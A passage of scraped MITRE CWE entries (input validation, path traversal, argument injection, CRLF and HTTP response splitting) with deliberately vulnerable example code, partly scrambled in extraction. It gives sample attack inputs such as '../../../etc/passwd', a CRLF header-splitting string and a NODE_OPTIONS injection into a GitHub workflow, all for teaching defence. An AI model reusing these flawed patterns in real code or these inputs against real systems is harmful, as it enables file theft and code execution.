private void buildList ( int untrustedListSize ){
if ( 0 > untrustedListSize ){ }die("Negative value supplied for list size, die evil hacker!"); }Widget[] list = new Widget [ untrustedListSize ]; list[0] = new Widget(); This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown. Example 5 This Android application has registered to handle a URL when sent an intent: (bad code)
Example Language: Java
... IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL"); MyReceiver receiver = new MyReceiver(); registerReceiver(receiver, filter); ... public class UrlHandlerReceiver extends BroadcastReceiver { @Override
public void onReceive(Context context, Intent intent) { if("com.example.URLHandler.openURL".equals(intent.getAction())) {
String URL = intent.getStringExtra("URLToOpen");
int length = URL.length(); ... } The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks. Multiple techniques exist to transform potentially dangerous input into something safe, which is different than "validation," which is a technique to check if an input is already safe. CWE users need to be cautious during root cause analysis to ensure that an issue is truly an input-validation problem. Terminology The "input validation" term is extremely common, but it is used in many different ways. In some cases its usage can obscure the real underlying weakness or otherwise hide chaining and composite relationships. Some people use "input validation" as a general term that covers many different neutralization techniques for ensuring that input is appropriate, such as filtering, i.e., attempting to remove dangerous inputs (related to CWE-790); encoding/escaping, i.e., attempting to ensure that the input is not misinterpreted when it is included in output to another component (related to CWE-116); or canonicalization, which often indirectly removes otherwise-dangerous inputs. Others use the term in a narrower context to simply mean "checking if an input conforms to expectations without changing it." CWE uses this narrow interpretation. Note that "input validation" has very different meanings to different people, or within different classification schemes. Caution must be used when referencing this CWE entry or mapping to it. For example, some weaknesses might involve inadvertently giving control to an attacker over an input when they should not be able to provide an input at all, but sometimes this is referred to as input validation. Finally, it is important to emphasize that the distinctions between input validation and output escaping are often blurred. Developers must be careful to understand the difference, including how input validation is not always sufficient to prevent vulnerabilities, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a person's last name is inserted into a query. The name "O'Reilly" would likely pass the validation step since it is a common last name in the English language. However, this valid name cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise transformed. In this case, removing the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded. Maintenance
As of 2020, this entry is used more often than preferred, and it is a source of frequent confusion. It is being actively modified for CWE 4.1 and subsequent versions.
Maintenance Maintenance
Input validation - whether missing or incorrect - is such an essential and widespread part of secure development that it is implicit in many different weaknesses. Traditionally, problems such as buffer overflows and XSS have been classified as input validation problems by many security professionals. However, input validation is not necessarily the only protection mechanism available for avoiding such problems, and in some cases it is not even sufficient. The CWE team has begun capturing these subtleties in chains within the Research Concepts view (CWE-1000), but more work is needed.
CWE-653: Improper Isolation or Compartmentalization
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions.
When a weakness occurs in functionality that is accessible by lower-privileged users, then without strong boundaries, an attack might extend the scope of the damage to higher-privileged users.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Single sign-on technology is intended to make it easier for users to access multiple resources or domains without having to authenticate each time. While this is highly convenient for the user and attempts to address problems with psychological acceptability, it also means that a compromise of a user's credentials can provide immediate access to all other resources or domains. Example 2 The traditional UNIX privilege model provides root with arbitrary access to all resources, but root is frequently the only user that has privileges. As a result, administrative tasks require root privileges, even if those tasks are limited to a small area, such as updating user manpages. Some UNIX flavors have a "bin" user that is the owner of system executables, but since root relies on executables owned by bin, a compromise of the bin account can be leveraged for root privileges by modifying a bin-owned executable, such as CVE-2007-4238. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
There is a close association with CWE-250 (Execution with Unnecessary Privileges). CWE-653 is about providing separate components for each "privilege"; CWE-250 is about ensuring that each component has the least amount of privileges possible. In this fashion, compartmentalization becomes one mechanism for reducing privileges.
Terminology
The term "Separation of Privilege" is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (this node) and using only one factor in a security decision (CWE-654). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion.
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterMany file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as "/usr/local/bin" to access unexpected files. This is referred to as absolute path traversal.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory. (bad code)
Example Language: Perl
my $dataPath = "/users/cwe/profiles";
my $username = param("user"); my $profilePath = $dataPath . "/" . $username; open(my $fh, "<", $profilePath) || ExitError("profile read error: $profilePath"); print "<ul>\n"; while (<$fh>) { print "<li>$_</li>\n"; }print "</ul>\n"; While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as: (attack code)
../../../etc/passwd
The program would generate a profile pathname like this: (result)
/users/cwe/profiles/../../../etc/passwd
When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file: (result)
/etc/passwd
As a result, the attacker could read the entire text of the password file. Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined. Example 2 In the example below, the path to a dictionary file is read from a system property and used to initialize a File object. (bad code)
Example Language: Java
String filename = System.getProperty("com.domain.application.dictionaryFile");
File dictionaryFile = new File(filename); However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory. Example 3 The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. (bad code)
Example Language: Perl
my $Username = GetUntrustedInput();
$Username =~ s/\.\.\///; my $filename = "/home/user/" . $Username; ReadAndSendFile($filename); Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: (attack code)
../../../etc/passwd
will have the first "../" stripped, resulting in: (result)
../../etc/passwd
This value is then concatenated with the /home/user/ directory: (result)
/home/user/../../etc/passwd
which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). Example 4 The following code attempts to validate a given input path by checking it against an allowlist and once validated delete the given file. In this specific case, the path is considered valid if it starts with the string "/safe_dir/". (bad code)
Example Language: Java
String path = getInputPath();
if (path.startsWith("/safe_dir/")) { File f = new File(path); }f.delete() An attacker could provide an input such as this: (attack code)
/safe_dir/../important.dat
The software assumes that the path is valid because it starts with the "/safe_path/" sequence, but the "../" sequence will cause the program to delete the important.dat file in the parent directory Example 5 The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. (good code)
Example Language: HTML
<form action="FileUploadServlet" method="post" enctype="multipart/form-data">
Choose a file to upload: <input type="file" name="filename"/> <br/> <input type="submit" name="submit" value="Submit"/> </form> When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. (bad code)
Example Language: Java
public class FileUploadServlet extends HttpServlet {
...
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html");
PrintWriter out = response.getWriter(); String contentType = request.getContentType(); // the starting position of the boundary header int ind = contentType.indexOf("boundary="); String boundary = contentType.substring(ind+9); String pLine = new String(); String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value // verify that content type is multipart form data if (contentType != null && contentType.indexOf("multipart/form-data") != -1) { // extract the filename from the Http header
BufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream())); ... pLine = br.readLine(); String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\"")); ... // output the file to the local upload directory try { BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));
for (String line; (line=br.readLine())!=null; ) { if (line.indexOf(boundary) == -1) { } //end of for loopbw.write(line); }bw.newLine(); bw.flush(); bw.close(); } catch (IOException ex) {...} // output successful upload response HTML page // output unsuccessful upload response HTML page else {...} ...
This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. Example 6 This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an error is printed to the user. (bad code)
Example Language: Python
import os
import sys def main():
filename = sys.argv[1]
main()
path = os.path.join(os.getcwd(), filename) try:
with open(path, 'r') as f:
except FileNotFoundError as e:
file_data = f.read()
print("Error - file not found")
However, if the user supplies an absolute path, the os.path.join() function will discard the path to the current working directory and use only the absolute path provided. For example, if the current working directory is /home/user/documents, but the user inputs /etc/passwd, os.path.join() will use only /etc/passwd, as it is considered an absolute path. In the above scenario, this would cause the script to access and read the /etc/passwd file. (good code)
Example Language: Python
import os
import sys def main():
filename = sys.argv[1]
main()
path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") if path.startswith("/home/cwe/documents/"):
try:
with open(path, 'r') as f:
except FileNotFoundError as e:
file_data = f.read()
print("Error - file not found")
The constructed path string uses os.sep to add the appropriate separation character for the given operating system (e.g. '\' or '/') and the call to os.path.normpath() removes any additional slashes that may have been entered - this may occur particularly when using a Windows path. The path is checked against an expected directory (/home/cwe/documents); otherwise, an attacker could provide relative path sequences like ".." to cause normpath() to generate paths that are outside the intended directory (CWE-23). By putting the pieces of the path string together in this fashion, the script avoids a call to os.path.join() and any potential issues that might arise if an absolute path is entered. With this version of the script, if the current working directory is /home/cwe/documents, and the user inputs /etc/passwd, the resulting path will be /home/cwe/documents/etc/passwd. The user is therefore contained within the current working directory as intended. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Pathname equivalence can be regarded as a type of canonicalization error.
Relationship
Some pathname equivalence issues are not directly related to directory traversal, rather are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing "/" on a filename could bypass access rules that don't expect a trailing /, causing a server to provide the file when it normally would not).
Terminology Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use "directory traversal" only to refer to the injection of ".." and equivalent sequences whose specific meaning is to traverse directories. Other variants like "absolute pathname" and "drive letter" have the *effect* of directory traversal, but some people may not call it such, since it doesn't involve ".." or equivalent. Research Gap Research Gap Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that "..\" is vulnerable, but not test "../" which may also be vulnerable. Any combination of directory separators ("/", "\", etc.) and numbers of "." (e.g. "....") can produce unique variants; for example, the "//../" variant is not listed (CVE-2004-0325). See this entry's children and lower-level descendants. Other
In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to apply to a wider range of files. For example, the product may add ".txt" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction.
CWE-59: Improper Link Resolution Before File Access ('Link Following')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Theoretical Link following vulnerabilities are Multi-factor Vulnerabilities (MFV). They are the combination of multiple elements: file or directory permissions, filename predictability, race conditions, and in some cases, a design limitation in which there is no mechanism for performing atomic file creation operations. Some potential factors are race conditions, permissions, and predictability.
CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product constructs a string for a command to be executed by a separate component
in another control sphere, but it does not properly delimit the
intended arguments, options, or switches within that command string.
When creating commands using interpolation into a string, developers may assume that only the arguments/options that they specify will be processed. This assumption may be even stronger when the programmer has encoded the command in a way that prevents separate commands from being provided maliciously, e.g. in the case of shell metacharacters. When constructing the command, the developer may use whitespace or other delimiters that are required to separate arguments when the command. However, if an attacker can provide an untrusted input that contains argument-separating delimiters, then the resulting command will have more arguments than intended by the developer. The attacker may then be able to change the behavior of the command. Depending on the functionality supported by the extraneous arguments, this may have security-relevant consequences. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Consider the following program. It intends to perform an "ls -l" on an input filename. The validate_name() subroutine performs validation on the input to make sure that only alphanumeric and "-" characters are allowed, which avoids path traversal (CWE-22) and OS command injection (CWE-78) weaknesses. Only filenames like "abc" or "d-e-f" are intended to be allowed. (bad code)
Example Language: Perl
my $arg = GetArgument("filename");
do_listing($arg); sub do_listing {
my($fname) = @_;
}
if (! validate_name($fname)) {
print "Error: name is not well-formed!\n";
}return; # build command my $cmd = "/bin/ls -l $fname"; system($cmd); sub validate_name {
my($name) = @_;
}
if ($name =~ /^[\w\-]+$/) {
return(1);
}else {
return(0);
}However, validate_name() allows filenames that begin with a "-". An adversary could supply a filename like "-aR", producing the "ls -l -aR" command (CWE-88), thereby getting a full recursive listing of the entire directory and all of its sub-directories. There are a couple possible mitigations for this weakness. One would be to refactor the code to avoid using system() altogether, instead relying on internal functions. Another option could be to add a "--" argument to the ls command, such as "ls -l --", so that any remaining arguments are treated as filenames, causing any leading "-" to be treated as part of a filename instead of another option. Another fix might be to change the regular expression used in validate_name to force the first character of the filename to be a letter or number, such as: (good code)
Example Language: Perl
if ($name =~ /^\w[\w\-]+$/) ...
Example 2 CVE-2016-10033 / [REF-1249] provides a useful real-world example of this weakness within PHPMailer. The program calls PHP's mail() function to compose and send mail. The fifth argument to mail() is a set of parameters. The program intends to provide a "-fSENDER" parameter, where SENDER is expected to be a well-formed email address. The program has already validated the e-mail address before invoking mail(), but there is a lot of flexibility in what constitutes a well-formed email address, including whitespace. With some additional allowed characters to perform some escaping, the adversary can specify an additional "-o" argument (listing an output file) and a "-X" argument (giving a program to execute). Additional details for this kind of exploit are in [REF-1250]. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
At one layer of abstraction, this can overlap other weaknesses that have whitespace problems, e.g. injection of javascript into attributes of HTML tags.
CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response. (bad code)
Example Language: Java
String author = request.getParameter(AUTHOR_PARAM);
... Cookie cookie = new Cookie("author", author); cookie.setMaxAge(cookieExpiration); response.addCookie(cookie); Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form: (result)
HTTP/1.1 200 OK
... Set-Cookie: author=Jane Smith ... However, because the value of the cookie is composed of unvalidated user input, the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as (attack code)
Wiley Hacker\r\nHTTP/1.1 200 OK\r\n
then the HTTP response would be split into two responses of the following form: (result)
HTTP/1.1 200 OK
... Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK ... The second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability to construct arbitrary HTTP responses permits a variety of resulting attacks, including:
Example 2 The following code is a workflow job written using YAML. The code attempts to download pull request artifacts, unzip from the artifact called pr.zip and extract the value of the file NR into a variable "pr_number" that will be used later in another job. It attempts to create a github workflow environment variable, writing to $GITHUB_ENV. The environment variable value is retrieved from an external resource. (bad code)
Example Language: Other
name: Deploy Preview
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: 'Download artifact'
uses: actions/github-script with:
script: |
- run: |
var artifacts = await github.actions.listWorkflowRunArtifacts({
owner: context.repo.owner,
});repo: context.repo.repo, run_id: ${{ github.event.workflow_run.id }}, var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => {
return artifact.name == "pr"
})[0];var downloadPr = await github.actions.downloadArtifact({
owner: context.repo.owner,
});repo: context.repo.repo, artifact_id: matchPrArtifact.id, archive_format: 'zip', var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data));
unzip pr.zip
echo "pr_number=$(cat NR)" >> $GITHUB_ENV
The code does not neutralize the value of the file NR, which is attacker controlled because it originates from a pull request that produced pr.zip. The attacker could escape the existing pr_number and create a new variable using a "\n" (CWE-93) followed by any environment variable to be added such as: (attack code)
\nNODE_OPTIONS="--experimental-modules --experiments-loader=data:text/javascript,console.log('injected code');//"
This would result in injecting and running javascript code (CWE-94) on the workflow runner with elevated privileges. (good code)
Example Language: Other
The code could be modified to validate that the NR
file only contains a numeric value, or the code could
retrieve the PR number from a more trusted source.
Example 3 If user input data that eventually makes it to a log message isn't checked for CRLF characters, it may be possible for an attacker to forge entries in a log file. (bad code)
Example Language: Java
logger.info("User's street address: " + request.getParameter("streetAddress"));
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.
HTTP agents or components may include a web server, load balancer, reverse proxy, web caching proxy, application firewall, web browser, etc. Regardless of the role, they are expected to maintain coherent, consistent HTTP communication state across all components. However, including unexpected data in an HTTP header allows an attacker to specify the entirety of the HTTP message that is rendered by the client HTTP agent (e.g., web browser) or back-end HTTP agent (e.g., web server), whether the message is part of a request or a response. When an HTTP request contains unexpected CR and LF characters, the server may respond with an output stream that is interpreted as "splitting" the stream into two different HTTP messages instead of one. CR is carriage return, also given by %0d or \r, and LF is line feed, also given by %0a or \n. In addition to CR and LF characters, other valid/RFC compliant special characters and unique character encodings can be utilized, such as HT (horizontal tab, also given by %09 or \t) and SP (space, also given as + sign or %20). These types of unvalidated and unexpected data in HTTP message headers allow an attacker to control the second "split" message to mount attacks such as server-side request forgery, cross-site scripting, and cache poisoning attacks. HTTP response splitting weaknesses may be present when:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response. (bad code)
Example Language: Java
String author = request.getParameter(AUTHOR_PARAM);
... Cookie cookie = new Cookie("author", author); cookie.setMaxAge(cookieExpiration); response.addCookie(cookie); Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form: (result)
HTTP/1.1 200 OK
... Set-Cookie: author=Jane Smith ... However, because the value of the cookie is composed of unvalidated user input, the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as (attack code)
